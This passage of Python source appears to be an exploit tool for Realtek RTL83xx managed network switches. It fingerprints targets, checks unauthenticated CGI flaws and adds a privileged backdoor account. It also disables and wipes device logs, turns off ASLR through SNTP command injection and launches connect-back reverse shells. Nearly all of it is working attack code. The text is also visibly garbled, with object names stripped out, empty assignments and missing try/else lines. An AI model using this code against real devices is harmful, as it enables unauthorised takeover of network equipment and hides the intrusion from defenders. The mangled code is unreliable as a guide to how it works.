    			# Disable logging
    			logging.status("Trying to disable")
    			query_args =['exploit']['stack_cgi_log']['content']
    			query_args = query_args.replace("_JUMP_", struct.pack('>L',['exploit']['stack_cgi_log']['log_settings_set'] + 0x58000000) ) # 0x58 will be overwritten
    			query_args = query_args.replace("_CMD_",['exploit']['stack_cgi_log']['log_settings_set_cmd'])
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    				logging.failure("Disable: Failed!")
    				return False
    			if self.Workaround:
    		except Exception as e:
    			if e.code == 502:
    				if self.Workaround:
    				return False
    			# clean ram log
    			logging.status("Trying to clean ramlog")
    			query_args =['exploit']['stack_cgi_log']['content']
    			query_args = query_args.replace("_JUMP_", struct.pack('>L',['exploit']['stack_cgi_log']['log_ramClear'] + 0x58000000) ) # 0x58 will be overwritten
    			query_args = query_args.replace("_CMD_",['exploit']['stack_cgi_log']['log_ramClear_cmd'])
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    				logging.failure("Clean RAM: Failed!")
    				return False
    			if self.Workaround:
    		except Exception as e:
    			if e.code == 502:
    				if self.Workaround:
    				return False
    			# clean file log
    			logging.status("Trying to clean filelog")
    			query_args =['exploit']['stack_cgi_log']['content']
    			query_args = query_args.replace("_JUMP_", struct.pack('>L',['exploit']['stack_cgi_log']['log_fileClear'] + 0x58000000) ) # 0x58 will be overwritten
    			query_args = query_args.replace("_CMD_",['exploit']['stack_cgi_log']['log_fileClear_cmd'])
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    				logging.failure("Clean FILE: Failed!")
    				return False
    			if self.Workaround:
    		except Exception as e:
    			if e.code == 502:
    				if self.Workaround:
    				return False
    		if self.Workaround:
    		return True
    	# Access: Unauthorized
    	def verify_target(self,target,check_all): = target
    		self.check_all = check_all
    		self.headers['Content-Type'] = "multipart/form-data; boundary=-------"
    		self.Workaround =['exploit']['heack_cgi_shell']['workaround']
    		sorted_dict = OrderedDict(sorted(['verify'].items(), key=lambda t: t[0])) # sorted by key
    		for check in sorted_dict:
    			if self.Workaround:
    			# If we will try exploit, verify only that CGI
    			if not self.check_all:
    				check =['exploit']['heack_cgi_shell']['cgi']
    			cgi = log.progress("{:.<30}".format(check))
    			if not len(['verify'][check]['content']) == 0:
    					query_args = "Content-Type\n\n" +['verify'][check]['content']
    					query_args =['verify'][check]['content']
    			if not['verify'][check]['safe']:
    				cgi.success("Vulnerable ({})".format(['verify'][check]['content']))
    			URI =['verify'][check]['uri']
    			if target.get('hash_uri'):
    				URI += self.netgear_hash(URI)
    				if not len(['verify'][check]['content']) == 0:
    					DEBUG("SEND",(URI, query_args))
    					response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    					response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
    				if['verify'][check]['response'] == 'json':
    					result = json.loads(
    					if result['result'] == 1 and result['msg'] == "Invalid file format.":
    						cgi.success("Vulnerable ({})".format(result['msg']))
    						if not self.check_all:
    							return True
    						cgi.failure("NOT Vulnerable")
    						if not self.check_all:
    							return False
    				elif['verify'][check]['response'] == 'xss':
    					response = re.split('["?=&<>]',	# bummer to split out '<>''
    					count = 0
    					for content in range(0,len(response)):
    						if response[content] ==['verify'][check]['content_check']:
    							if not self.check_all:
    								return True
    							# Since we split out '<>' above, make sure to count in 'script' and '/script'
    							if response[content] == 'alert(XSS);' and response[content-1] == 'script' and response[content+1] == '/script':
    								count += 1
    					if count:
    						cgi.success("Vulnerable (XSS: {})".format(count))
    						if not self.check_all:
    							return True
    						cgi.failure("NOT Vulnerable")
    						if not self.check_all:
    							return False
    				elif['verify'][check]['response'] == 'html':
    					response = re.split("['()<>\n:,.&=]",
    					for content in range(0,len(response)):
    						if response[content] ==['verify'][check]['content_check'] or response[content] == 'Image CRC32 Error':
    							cgi.success("Vulnerable ({})".format(response[content]))
    							if not self.check_all:
    								return True
    						# We checking what will be returned from the request
    						# 1. The error message is correct
    						# 2. LEN of our 'content' matching reported LEN from target
    						elif response[content] == 'errkey':
    							if response[content+1] ==['verify'][check]['content_check'] and int(response[content+3]) == int(len(['verify'][check]['content'])):
    								cgi.success("Vulnerable ({})".format(response[content+1]))
    								if not self.check_all:
    									return True
    								cgi.failure("NOT Vulnerable")
    								if not self.check_all:
    									return False
    				elif['verify'][check]['response'] == 'file':
    							time.sleep(1) # Some checks needs to have some time
    							URI =['verify'][check]['check_uri']
    							response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
    							response =
    							if response ==['verify'][check]['content_check']:
    								cgi.success("Vulnerable ({})".format(response))
    								if not self.check_all:
    									return True
    								cgi.failure("NOT Vulnerable")
    								if not self.check_all:
    									return False
    						except Exception as e:
    							return False
    						cgi.failure("Not vulnerable")
    						if not self.check_all:
    							return False
    				cgi.failure("Not vulnerable")
    				if not self.check_all:
    					return False
    			except Exception as e:
    				if e.code == 502:
    					cgi.success("Vulnerable ({})".format(e))
    					if not self.check_all:
    						return True
    					return False
    		return True
    	# Access: Unauthorized
    	def check_remote(self,etag):
    		self.manualETag = etag
    		remote = log.progress("Target")
    		if self.manualETag:
    			if self.manualETag == 'help':
    				print ""
    				remote.success("List of known targets")
    			elif self.manualETag == 'info':
    				print ""
    				remote.success("Brief information of known targets")
    			target = Vendor(self.manualETag).dict()
    			if target:
    				remote.success("{} ({} v{})".format(target['vendor'],target['model'],target['version']))
    				return target
    				remote.failure("Unknown ({})".format(self.manualETag))
    				return False
    		URI = '/'
    		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) # encoded
    		result =
    		# Use HTTP ETag to identify remote vendor and FW version, to choose right code/gadgets
    		self.ETag ='ETag').replace('"','')
    		target = Vendor(self.ETag).dict()
    		if not target:
    			remote.failure("Unknown ({})".format(self.ETag))
    			return False
    		if target:
    			remote.success("{} ({} v{})".format(target['vendor'],target['model'],target['version']))
    			if target['info_leak']:
    				info_leak = log.progress("Model")
    				URI = target['info_leak_uri']
    				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) # encoded
    				response =
    				if target['info_leak_JSON']:
    					result = json.loads(response)
    					tmp = result.get('data')
    					if tmp.get('description'):
    					elif tmp.get('productName'):
    					elif tmp.get('title'):
    					response = re.split('[()<>\n:,.;=" ]',response)
    					for check in range(0,len(response)):
    						if response[check] == 'modelName':
    							return target
    					info_leak.failure("Not found")
    					print response
    			return target
    	# Access: Unauthorized
    	def add_user(self,target): = target
    		add = log.progress("Adding credentials")
    		if not['exploit']['priv15_account']['vulnerable']:
    			add.failure("Not listed as vulnerable")
    				return self.stack_add_account(
    				return False
    		USERNAME = self.credentials.split(':')[0]
    		if USERNAME == 'admin' or USERNAME == 'cisco':
    			log.failure("[bad boy] Username '{}' shall not be changed!".format(USERNAME))
    			return False
    		if target['exploit']['priv15_account']['encryption'] == 'md5':
    			PASSWORD = self.md5hash(self.credentials.split(':')[1], base64encode=True)
    		elif target['exploit']['priv15_account']['encryption'] == 'clear':
    			PASSWORD = self.credentials.split(':')[1]
    		elif target['exploit']['priv15_account']['encryption'] == 'nopassword':
    			PASSWORD = 'nopassword' # dummy
    			log.failure("No password type")
    			return False
    		query_args =['exploit']['priv15_account']['content']
    		query_args = query_args.replace('USERNAME',USERNAME)
    		query_args = query_args.replace('PASSWORD',PASSWORD)
 "Credentials: {}/{}".format(USERNAME,PASSWORD))
    			URI = target['exploit']['priv15_account']['add_uri']
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    			response =
    			for check in range(0,len(response)):
    				if response[check] == 'init(){fileLoadWait();' or response[check] == 'id="reason">Merging' or response[check] == '(tmpStr.indexOf("FlashWriteDone")':
    					time.sleep(5) # Wait a bit so the account will be merged
    					return True
    		except Exception as e:
    			add.failure("error {}".format(e))
    			return False
    		print response
    		return False
    	# Access: Authenticated
    	def del_user(self, target): = target
    		if not['exploit']['priv15_account']['vulnerable']:
    			remove.failure("Not listed as vulnerable")
    				return self.stack_del_account(
    				return False
    		USERNAME = self.credentials.split(':')[0]
    		remove = log.progress("Remove credentials for {}".format(USERNAME))
    		if USERNAME == 'admin' or USERNAME == 'cisco':
    			remove.failure("[bad boy] Username '{}' shall not be deleted!".format(USERNAME))
    			return False
    		if self.check_XSID(
    			self.headers['X-CSRF-XSID'] = self.Cisco_XSID(
    			URI = target['exploit']['priv15_account']['del_uri']
    			if len(['exploit']['priv15_account']['del_query']) >= 1:
    				query_args =['exploit']['priv15_account']['del_query']
    				query_args = query_args.replace('USERNAME',USERNAME)
    				DEBUG("SEND",(URI, query_args))
    				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    				result = response
    				URI = URI.replace('USERNAME',USERNAME)
    				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
    				result = response
    				response =
    			if not['exploit']['priv15_account']['json']:
    				if result.code == 200 and len(response) == 0:
    					return True
    				response = response.split("'")
    				for check in range(0,len(response)):
    					if response[check] == ': The user is not exist!!<br>' or response[check] == 'Error String':
    						remove.failure("User do not exist")
    						return False
    				return False
    				result = json.loads(
    				if result['status'] == 'ok' and result['msgType'] == 'save_success':
    					return True
    		except Exception as e:"error {}".format(e))
    			return False
    		print result
    		return False
    	# Access: Authenticated
    	def logout(self, target): = target
    		logout = log.progress("Logging out")
    		if not['login']['vulnerable']:
    			logout.failure("Not listed as vulnerable")
    			return False
    		if self.check_XSID(
    			self.headers['X-CSRF-XSID'] = self.Cisco_XSID(
    		URI =['login']['logout_uri']
    		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) # encoded
    		response =
    		if not['login']['json']:
    			response = response.split()
    			for check in range(0,len(response)):
    				if response[check] == 'function goback(){' or response[check] == 'onload="goback();">': 
    					return True
    			return False
    			result = json.loads(response)
    			if result['status'] == 'ok' and result['msgType'] == 'success' or result['status'] == 'ok' and result['msgType'] == 'save_success':
    				return True
    				print result
    				return False
    	# Access: Authenticated
    	def login(self,target): = target
    		login = log.progress("Login")
    		if not['login']['vulnerable']:
    			login.failure("Not listed as vulnerable")
    			return False
    		# login
    			USERNAME = self.credentials.split(':')[0]
    			if['login']['encryption'] == 'rsa':
    				PASSWORD = self.RSA_Password(self.credentials.split(':')[1])
    			elif['login']['encryption'] == 'caesar':
    				PASSWORD = self.caesar_encode(self.credentials.split(':')[1])
    			elif['login']['encryption'] == 'encode':
    				PASSWORD = self.obfuscation_encode(self.credentials.split(':')[1])
    			elif['login']['encryption'] == 'clear':
    				PASSWORD = self.credentials.split(':')[1]
    				login.failure("No login password matching")
    				return False
    			query_args =['login']['query']
    			query_args = query_args.replace('USERNAME',USERNAME)
    			query_args = query_args.replace('PASSWORD',PASSWORD)
    			URI =['login']['login_uri']
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    			response =
    			if not['login']['json']:
    				response = response.split()
    				for check in range(0,len(response)):
    					if response[check] == 'top.location.replace("/cgi-bin/dispatcher.cgi?cmd=1")' or response[check] == 'href="':
    						return True
    					elif response[check] == 'window.location.replace("/cgi-bin/dispatcher.cgi?cmd=3");':
    						login.success("Already logged in")
    						return True
    					elif response[check] == 'top.location.replace("/cgi-bin/dispatcher.cgi?cmd=5")':
    						return False
    					elif len(response) == check + 1:
    						login.failure("Not supported device")
    						print response
    						return False
    				result = json.loads(response)
    				if result['status'] == 'ok' and result['msgType'] == 'save_success' or result['status'] == 'ok' and result['msgType'] == 'success':
    					URI =['login']['status_uri']
    					response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
    					response =
    					result = json.loads(response)
    					if result['data']['status'] == 'ok':
    						return True
    					elif result['data']['status'] == 'authing':
    						# try one more time
    						URI =['login']['status_uri']
    						login.status("One more time...")
    						response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
    						response =
    						result = json.loads(response)
    						if result['data']['status'] == 'ok':
    							return True
    							login.failure("Failed (Authing)")
    							return False
    					elif result['data']['status'] == 'fail':
    						login.failure("Failed {}".format(result['data']['failReason']))
    						return False
    		except Exception as e:
    			login.failure("error {}".format(e))
    		return False
    	# Access: Authenticated
    	def disable_clean_log(self, target): = target
    		clear_log = log.progress("Logging disable & clean")
    		if not['log']['vulnerable']:
    			clear_log.failure("Not listed as vulnerable")
    			return False
    		if self.check_XSID(
    			self.headers['X-CSRF-XSID'] = self.Cisco_XSID(
    			clear_log.status("Trying to disable")
    			URI =['log']['disable_uri']
    			query_args =['log']['disable_query']
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    			response =
    			URI =['log']['status']
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
    			response =
    			if not['log']['json']:
    				response = re.split("[<>\n]",response)
    				for check in range(0,len(response)):
    					if response[check] == 'window.location.replace("/cgi-bin/dispatcher.cgi?cmd=5120");':
    			else: # json
    				result = json.loads(response)
    				if result['data']['logState'] == False:
    					clear_log.failure("Logging still enabled")
    					return False
    			clear_log.status("Trying to clean")
    			URI =['log']['clean_logfile_uri']
    			query_args =['log']['clean_logfile_query']
    			DEBUG("SEND",(URI, query_args))
    			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    			response =
    			if not['log']['json']:
    				response = re.split("[<>'\n]",response)
    				for check in range(0,len(response)):
    					if response[check] == '/cgi-bin/dispatcher.cgi?cmd=5129' or response[check] == '/cgi-bin/dispatcher.cgi?cmd=4361':
    						URI =['log']['clean_logmem_uri']
    						query_args =['log']['clean_logmem_query']
    						DEBUG("SEND",(URI, query_args))
    						response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    						response =
    						response = re.split("[<>'\n]",response)
    						for check in range(0,len(response)):
    							if response[check] == '/cgi-bin/dispatcher.cgi?cmd=5129' or response[check] == '/cgi-bin/dispatcher.cgi?cmd=4361':
    								return True
    				return False
    			else: # json
    				result = json.loads(response)
    				if result['status'] == 'ok' and result['msgType'] == 'save_success':
    					URI =['log']['clean_logmem_uri']
    					query_args =['log']['clean_logmem_query']
    					DEBUG("SEND",(URI, query_args))
    					response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    					response =
    					result = json.loads(response)
    					if result['status'] == 'ok' and result['msgType'] == 'save_success':
    						return True
    						return False
    					return False
    		except Exception as e:"error {}".format(e))
    			return False
    		clear_log.failure("LOG Failed")
    		return False
    	# Access: Authenticated
    	def SNTP(self, target): = target
    		SNTP = log.progress("SNTP")
    		if not['exploit']['sntp']['vulnerable']:
    			SNTP.failure("Not listed as vulnerable")
    			return False
    		if self.check_XSID(
    			self.headers['X-CSRF-XSID'] = self.Cisco_XSID(
    		SNTP.status("Enable SNTP")
    		URI =['exploit']['sntp']['enable_uri']
    		query_args =['exploit']['sntp']['enable_query']
    		DEBUG("SEND",(URI, query_args))
    		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    		response =
    		if not['exploit']['sntp']['json']:
    			response = re.split("[<>\n]",response)
    			for check in range(0,len(response)):
    				if response[check] == 'SNTP':
    					if response[check+5] == 'Enabled' or response[check+5] == 'Enable' or response[check+7] == 'Enabled' or response[check+7] == 'Enable':
    						SNTP.status("SNTP Enabled")
    					elif response[check+5] == 'Disabled' or response[check+5] == 'Disable' or response[check+7] == 'Disabled' or response[check+7] == 'Disable':
    						SNTP.failure("SNTP Disabled")
    						return False
    						SNTP.failure("Enable SNTP Failed")
    						return False
    		else: # json
    			response = self.clean_json(response)
    			result = json.loads(response)
    			if result['status'] == 'ok' and result['msgType'] == 'save_success':
    				URI =['exploit']['sntp']['status_uri']
    				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
    				response =
    				response = self.clean_json(response)
    				result = json.loads(response)
    				for status in result['data']:
    					if status == 'sntp' and result['data']['sntp'] == True:
    						SNTP.status("SNTP Enabled")
    					elif status == 'sntp' and result['data']['sntp'] == False:
    						SNTP.failure("SNTP Disabled")
    						return False
    					elif status == 'sntpStatus' and result['data']['sntpStatus'] == True:
    						SNTP.status("SNTP Enabled")
    					elif status == 'sntpStatus' and result['data']['sntpStatus'] == False:
    						SNTP.failure("SNTP Disabled")
    						return False
    				SNTP.failure("Enable SNTP Failed")
    				return False
    		URI =['exploit']['sntp']['inject_uri']
    		query_args =['exploit']['sntp']['inject_query']
    		DEBUG("SEND",(URI, query_args))
    		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    		response =
    		if not['exploit']['sntp']['json']:
    			response = response.split('"')
    			for check in range(0,len(response)):
    				if response[check] == '/cgi-bin/dispatcher.cgi?cmd=549':
    					query_args =['exploit']['sntp']['check_query']
    					DEBUG("SEND",(URI, query_args))
    					response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    					response =
    					response = response.split('"')
    					for check in range(0,len(response)):
    						if response[check] == '/cgi-bin/dispatcher.cgi?cmd=549':
    							URI =['exploit']['sntp']['verify_uri']
    							response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
    							response =
    							if response[0] == '0':
    								SNTP.status("ASLR disabled")
    								SNTP.failure("Check Failed")
    								return False
    		else: # json
    			response = self.clean_json(response)
    			result = json.loads(response)
    			if result['status'] == 'ok' and result['msgType'] == 'save_success':
    				query_args =['exploit']['sntp']['check_query']
    				DEBUG("SEND",(URI, query_args))
    				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    				response =
    				response = self.clean_json(response)
    				result = json.loads(response)
    				if result['status'] == 'ok' and result['msgType'] == 'save_success':
    					URI =['exploit']['sntp']['verify_uri']
    					response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
    					response =
    					if response[0] == '0':
    						SNTP.status("ASLR disabled")
    						SNTP.failure("Check Failed")
    						return False
    					SNTP.failure("RCE #2 Failed")
    					return False
    				SNTP.failure("RCE #1 Failed")
    				return False
    		SNTP.status("Removing RCE")
    		URI =['exploit']['sntp']['delete_uri']
    		query_args =['exploit']['sntp']['delete_query']
    		DEBUG("SEND",(URI, query_args))
    		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    		response =
    		if not['exploit']['sntp']['json']:
    			response = response.split('"')
    			for check in range(0,len(response)):
    				if response[check] == '/cgi-bin/dispatcher.cgi?cmd=549':
    					SNTP.status("RCE Removed")
    		else: # json
    			response = self.clean_json(response)
    			result = json.loads(response)
    			if result['status'] == 'ok' and result['msgType'] == 'save_success':
    				SNTP.status("RCE Removed")
    				SNTP.failure("RCE Remove Failed")
    				return False
    		URI =['exploit']['sntp']['disable_uri']
    		query_args =['exploit']['sntp']['disable_query']
    		DEBUG("SEND",(URI, query_args))
    		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
    		response =
    		if not['exploit']['sntp']['json']:
    			response = re.split("[<>\n]",response)
    			for check in range(0,len(response)):
    				if response[check] == 'SNTP':
    					if response[check+5] == 'Enabled' or response[check+5] == 'Enable' or response[check+7] == 'Enabled' or response[check+7] == 'Enable':
    						SNTP.failure("SNTP Enabled")
    					elif response[check+5] == 'Disabled' or response[check+5] == 'Disable' or response[check+7] == 'Disabled' or response[check+7] == 'Disable':
    						SNTP.status("SNTP Disabled")
    						SNTP.failure("Disable SNTP Failed")
    						return False
    		else: # json
    			response = self.clean_json(response)
    			result = json.loads(response)
    			if result['status'] == 'ok' and result['msgType'] == 'save_success':
    				URI =['exploit']['sntp']['status_uri']
    				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
    				response =
    				response = self.clean_json(response) # MCW TEST
    				result = json.loads(response)
    				for status in result['data']:
    					if status == 'sntp' and result['data']['sntp'] == True:
    						SNTP.failure("SNTP Enabled")
    						return False
    					elif status == 'sntp' and result['data']['sntp'] == False:
    						SNTP.status("SNTP Disabled")
    					elif status == 'sntpStatus' and result['data']['sntpStatus'] == True:
    						SNTP.failure("SNTP Enabled")
    						return False
    					elif status == 'sntpStatus' and result['data']['sntpStatus'] == False:
    						SNTP.status("SNTP Disabled")
    				SNTP.failure("Disable SNTP Failed")
    				return False
    		SNTP.success("ASLR: Success")
    		return True
    if __name__ == '__main__':
    	# Help, info and pre-defined values
    	INFO ='Realtek Managed Switch Controller RTL83xx PoC (2019 bashis)\n'
    	HTTP = "http"
    	HTTPS = "https"
    	proto = HTTP
    	verbose = False
    	raw_request = True
    	rhost = ''	# Default Remote HOST
    	rport = '80'			# Default Remote PORT
    	lhost = ''	# Default Local HOST
    	lport = '1337'			# Default Local PORT
    	creds = 'pwn:pwn'		# creds = 'user:pass'
    	etag = ''
    	# Try to parse all arguments
    		arg_parser = argparse.ArgumentParser(
    				description=('[*] '+ INFO +' [*]'))
    		arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
    		arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
    		arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
    		arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
    		if creds:
    			arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
    		arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
    		arg_parser.add_argument('--hydra', required=False, default=False, action='store_true', help='Boa/Hydra Web Server - reverse shell')
    		arg_parser.add_argument('--force', required=False, default=False, action='store_true', help='Ignore warnings for exploits marked not safe')
    		arg_parser.add_argument('--etag', required=False, help='Select target manually with their ETag')
    		arg_parser.add_argument('--shell', required=False, default=False, action='store_true', help='Unauthenticated - reverse shell - CGIs')
    		arg_parser.add_argument('--debug', required=False, default=False, action='store_true', help='Debug SEND/RECV data and line numbers in code')
    		arg_parser.add_argument('--verify', required=False, default=False, action='store_true', help='Verify unauthenticated vulnerabilities - CGIs')
    		arg_parser.add_argument('--report', required=False, default=False, action='store_true', help='Generate report based on dictionary')
    		arg_parser.add_argument('--adduser', required=False, default=False, action='store_true', help='Add "'+ creds + '" with privilege 15')
    		arg_parser.add_argument('--deluser', required=False, default=False, action='store_true', help='Delete "'+ creds + '" credentials')
    		args = arg_parser.parse_args()
    	except Exception as e:"Error: {}".format(e))
    	# We want at least one argument, so print out help
    	if len(sys.argv) == 1:
    	print ""
    	if args.debug:
    		debug = True
    	if args.force:
    		force = True
    	# Check validity, update if needed, of provided options
    	if args.https:
    		proto = HTTPS
    		if not args.rport:
    			rport = '443'
    	if creds and args.auth:
    		creds = args.auth
    	if args.rport:
    		rport = args.rport
    	if args.etag:
    		etag = args.etag
    	if args.rhost:
    		rhost = args.rhost
    	if args.lport:
    		lport = args.lport
    	if args.lhost:
    		lhost = args.lhost
    	# Check if RPORT is valid
    	if not Validate(verbose).Port(rport):
    		log.failure("Invalid RPORT - Choose between 1 and 65535")
    	# Check if LPORT is valid
    	if not Validate(verbose).Port(lport): #
    		log.failure("Invalid LPORT - Choose between 1 and 65535")
    	# Let's break apart the hex code of LPORT into two bytes and check for badbyte 0x00
    	port_hex = hex(int(lport))[2:]
    	port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)
    	port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))
    	port_hex = port_hex.split()
    	if len(port_hex) == 1:
    		port_hex = ('00' + ' ' + ''.join(port_hex)).split()
    	for c in port_hex:
    		if c == '00':
    			log.failure("Choosen port (dec: {}, hex: {}) contains 0x00 - aborting".format(lport,hex(int(lport))))
    	# Check if RHOST is valid IP or FQDN, get IP back
    	rhost = Validate(verbose).Host(rhost)
    	if not rhost:
    		log.failure("Invalid RHOST")
    	# Check if LHOST is valid IP or FQDN, get IP back
    	lhost = Validate(verbose).Host(lhost)
    	if not lhost:
    		log.failure("Invalid LHOST")
    	# Validation done, start print out stuff to the user
    	if args.https:"HTTPS / SSL Mode Selected")"RHOST: {}".format(rhost))"RPORT: {}".format(rport))"LHOST: {}".format(lhost))"LPORT: {}".format(lport))
    	rhost = rhost + ':' + rport
    		headers = {
    		# We can manually select target with the '--etag'
    		target = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).check_remote(etag)
    		# Whole code based on known 'target's ETag
    		if target:
    			if args.verify:
    				RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).verify_target(target,True) # check all listed
    			elif args.hydra:
    				if not target['exploit']['heack_hydra_shell']['safe'] and not args.force:
    					log.failure("Boa/Hydra listed as not safe (most likely DoS), force with '--force'")
    					log.failure("The best chance of success is with fresh heap and select target model manually")
    					log.failure("use '--etag' for manual selection, '--etag help' for known targets")
    					success = False
    					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).heack_hydra_shell(target)
    					success = False
    			elif args.adduser:
    				if target['exploit']['stack_cgi_add_account']['vulnerable']:
    					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_add_account(target)
    					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).add_user(target)
    			elif args.deluser:
    				if target['exploit']['stack_cgi_del_account']['vulnerable']:
    					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_del_account(target)
    					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).login(target)
    					if success:
    						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).del_user(target)
    						if success:
    							success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).logout(target)
    				success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).verify_target(target,False) # check only one
    				# shellcode on heap, no need to disable ASLR
    				if not target['exploit']['heack_cgi_shell']['stack']:
    					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_log(target)
    				# shellcode on stack, we need to disable ASLR
    				elif target['exploit']['stack_cgi_diag']['vulnerable']:
    					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_log(target)
    					if success:
    						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_diag(target)
    				elif target['exploit']['stack_cgi_sntp']['vulnerable']:
    					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_log(target)
    					if success:
    						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_sntp(target)
    				# or we take the long way
    				elif target['login']['vulnerable'] and not target['exploit']['stack_cgi_diag']['vulnerable'] or not target['exploit']['stack_cgi_sntp']['vulnerable']:
    					if not args.auth:
    						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).add_user(target)
    					if success:
    						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).login(target)
    					if success:
    						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).disable_clean_log(target)
    					if success:
    						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).SNTP(target)
    					if success and not args.auth:
    						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).del_user(target)
    					if success:
    						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).logout(target)
    					log.failure("We have no way to reach shellcode...")
    					success = False
    				# No meaning to try exploit if above failed
    				if success:
    					RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).heack_shell(target)
    	except Exception as e:"Failed: ({})".format(e))
"All done...")